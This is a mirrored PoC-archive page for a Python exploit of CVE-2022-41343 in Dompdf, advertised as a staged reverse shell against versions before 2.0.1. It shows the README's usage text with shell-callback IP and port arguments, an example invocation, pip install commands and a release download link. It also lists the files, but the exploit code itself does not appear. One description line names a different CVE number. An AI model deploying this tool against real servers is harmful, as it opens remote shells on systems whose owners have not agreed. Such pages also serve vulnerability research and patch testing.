Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-41343 PoC — Dompdf 安全漏洞

Source
Associated Vulnerability
Title:Dompdf 安全漏洞 (CVE-2022-41343)
Description:Dompdf是一个 HTML 到 PDF 的转换器。 Dompdf 2.0.1之前版本存在安全漏洞,该漏洞源于URI验证失败不会停止字体注册。
Description
🐍 Python Exploit for CVE-2022-23935
Readme
# CVE-2022-41343
🐍 Python Exploit for CVE-2022-41343

Staged Reverse Shell for dompdf < 2.0.1

Based on: [Positive Sec's write-up](https://positive.security/blog/dompdf-rce) and [PoC](https://github.com/positive-security/dompdf-rce)

## Example
```
cve-2022-41343 10.10.16.3 44444
```

## Usage
```bash
usage: cve-2022-41343 [-h] [-l SERVER_PORT] [-s SHELL] [-n FONT_NAME] ip port

positional arguments:
  ip                    Shell Callback IP Address/Host
  port                  Shell Callback Port

options:
  -h, --help            show this help message and exit
  -l SERVER_PORT, --listen SERVER_PORT
                        Server Listening Port (default: 55555)
  -s SHELL, --shell SHELL
                        Remote Shell (default: bash)
  -n FONT_NAME, --font-name FONT_NAME
                        Exploit Font Name (default: comicsploitz)
```
## PyPi Installation
```bash
python3 -m pip install cve-2022-41343
```

## Manual Installation
```bash
python3 -m pip install cve-2022-41343-1.0.0-py3-none-any.whl
```
[Download Latest Release](https://github.com/BKreisel/CVE-2022-41343/releases/download/1.0.0/cve_2022_41343-1.0.0-py3-none-any.whl)

## Demo
[![demo](https://asciinema.org/a/560597.svg)](https://asciinema.org/a/560597?autoplay=1)
File Snapshot

[4.0K] /data/pocs/deb3f35f27ab8c436c3320a9fe54bd4dfed11be5 ├── [1.0K] LICENSE ├── [ 721] pyproject.toml ├── [1.2K] README.md └── [4.0K] src └── [4.0K] cve_2022_41343 ├── [ 0] __init__.py └── [9.3K] main.py 2 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.